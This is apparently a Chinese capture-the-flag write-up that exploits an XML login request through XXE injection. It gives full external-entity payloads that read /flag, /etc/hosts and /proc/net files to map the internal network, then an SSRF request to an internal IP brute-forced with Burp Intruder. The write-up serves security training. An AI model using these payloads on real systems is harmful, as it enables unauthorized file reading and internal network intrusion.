打开连接
熟悉的界面,我们就不做黑盒测试了,直接抓包修改xml
payload:<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///flag">
]>
<user><username>&admin;</username><password>123456</password></user>
测试直接读取flag失败,试试内网探测看是否有结果
内网探测命令
/etc/hosts
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/proc/net/dev
/proc/net/fib_trie
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///etc/hosts">
]>
<user><username>&admin;</username><password>123456</password></user>
并未发现任何主机,尝试其他命令
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///proc/net/arp">
]>
<user><username>&admin;</username><password>123456</password></user>
这里扫出了两个主机,尝试访问
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "http://10.128.253.12 ">
]>
<user><username>&admin;</username><password>123456</password></user>
失败
用BP的intruder模块来爆破ip1-100
add这里
设置数字字典从1到100
线程可以调高点
这里我把两个ip都爆破了一次,都没发现flag
尝试其他命令进行探测最后用此命令扫出了正确的ip
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///proc/net/fib_trie">
]>
<user><username>&admin;</username><password>123456</password></user>
爆破得到flag
芜湖